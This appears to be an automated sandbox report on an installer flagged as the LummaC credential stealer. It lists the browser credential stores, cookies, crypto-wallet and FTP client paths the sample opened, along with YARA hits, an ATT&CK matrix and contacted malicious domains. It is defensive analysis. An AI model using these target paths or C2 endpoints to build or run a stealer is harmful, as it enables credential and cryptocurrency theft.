Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Directory queried: C:\Users\user\Documents\Outlook Files	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	Directory queried: C:\Users\user\Documents\Outlook Files	Jump to behavior

Source: Yara match

File source: Process Memory Space: Lightweight.com PID: 2920, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: Yara match	File source: 10.3.7zG.exe.1bfd0a76ee0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7zG.exe PID: 744, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\Desktop\installer_1.05_36.4\TCCTL32.DLL, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	13 Process Injection	11 Masquerading	2 OS Credential Dumping	221 Security Software Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	221 Virtualization/Sandbox Evasion	11 Input Capture	3 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	Logon Script (Windows)	13 Process Injection	Security Account Manager	221 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	12 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Rundll32	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
installer_1.05_36.4.zip	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\709182\Lightweight.com	0%	ReversingLabs
C:\Users\user\Desktop\installer_1.05_36.4\Lang\lang-1049.dll	0%	ReversingLabs
C:\Users\user\Desktop\installer_1.05_36.4\Lang\lang-1058.dll	0%	ReversingLabs
C:\Users\user\Desktop\installer_1.05_36.4\TCCTL32.DLL	3%	ReversingLabs
C:\Users\user\Desktop\installer_1.05_36.4\opengl32sw.dll	0%	ReversingLabs
C:\Users\user\Desktop\installer_1.05_36.4\opengl64.dll	0%	ReversingLabs
C:\Users\user\Desktop\installer_1.05_36.4\vcruntime140.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://dfgh.online/invoker.php?compName=	0%	Avira URL Cloud	safe
https://cegu.shop/	0%	Avira URL Cloud	safe
https://klipsyzogey.shop:443/int_clp_sha.txt4.dbPK	100%	Avira URL Cloud	malware
http://www.avast.com0/	0%	Avira URL Cloud	safe
https://dfgh.online	0%	Avira URL Cloud	safe
https://bugs.freedesktop.org/enter_bug.cgi?product=Mesa	0%	Avira URL Cloud	safe
https://laborersquei.click/	0%	Avira URL Cloud	safe
https://klipsyzogey.shop/	100%	Avira URL Cloud	malware
http://www.crossteccorp.com	0%	Avira URL Cloud	safe
http://www.microsoft.Ah	0%	Avira URL Cloud	safe
https://laborersquei.click/apie	0%	Avira URL Cloud	safe
http://www.google.comDUMPREQFLUSHD:/build/	0%	Avira URL Cloud	safe
http://go.microsx	0%	Avira URL Cloud	safe
https://epicsupport.force.com/unrealengine/s/	0%	Avira URL Cloud	safe
https://klipsyzogey.shop/int_clp_sha.txt	100%	Avira URL Cloud	malware
https://laborersquei.click:443/api	0%	Avira URL Cloud	safe
laborersquei.click	0%	Avira URL Cloud	safe
https://laborersquei.click/api	0%	Avira URL Cloud	safe
https://cegu.shop/8574262446/ph.txt	0%	Avira URL Cloud	safe
https://dfgh.online/invoker.php?compName=user-PCLg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cegu.shop	185.161.251.21	true	false	unknown
laborersquei.click	172.67.166.49	true	true	unknown
klipsyzogey.shop	172.67.214.186	true	false	high
MKEsavqGIoOOFKIkcwQOiuYAysc.MKEsavqGIoOOFKIkcwQOiuYAysc	unknown	unknown	false	unknown
dfgh.online	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
hummskitnj.buzz	false		high
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
laborersquei.click	true	Avira URL Cloud: safe	unknown
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
https://klipsyzogey.shop/int_clp_sha.txt	false	Avira URL Cloud: malware	unknown
prisonyfork.buzz	false		high
https://cegu.shop/8574262446/ph.txt	false	Avira URL Cloud: safe	unknown
https://laborersquei.click/api	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	false		high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	Lightweight.com, 00000017.00000003.2161329434.0000000005D06000.00000004.00000800.00020000.00000000.sdmp	false		high
https://klipsyzogey.shop:443/int_clp_sha.txt4.dbPK	Lightweight.com, 00000017.00000002.2299988690.0000000000CD2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	Lightweight.com, 00000017.00000003.1903900954.0000000003CCC000.00000004.00000800.00020000.00000000.sdmp, Lightweight.com, 00000017.00000003.1904145611.0000000003C04000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	7zG.exe, 0000000A.00000003.1473463761.000001BFD0A4F000.00000004.00000800.00020000.00000000.sdmp, opengl64.dll.10.dr	false		high
http://www.unicode.org/copyright.html	opengl64.dll.10.dr	false		high
https://contoso.com/License	powershell.exe, 0000001E.00000002.2342405729.0000000006179000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cegu.shop/	Lightweight.com, 00000017.00000002.2304957335.0000000000FAD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsps.ssl.com0	installer_1.05_36.4.exe.10.dr	false		high
https://dfgh.online/invoker.php?compName=	powershell.exe, 0000001C.00000002.2132862025.000000000336C000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.avast.com0/	lang-1049.dll.10.dr, lang-1058.dll.10.dr	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6	powershell.exe, 0000001C.00000002.2134794357.00000000050C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2321451025.0000000005121000.00000004.00000800.00020000.00000000.sdmp	false		high
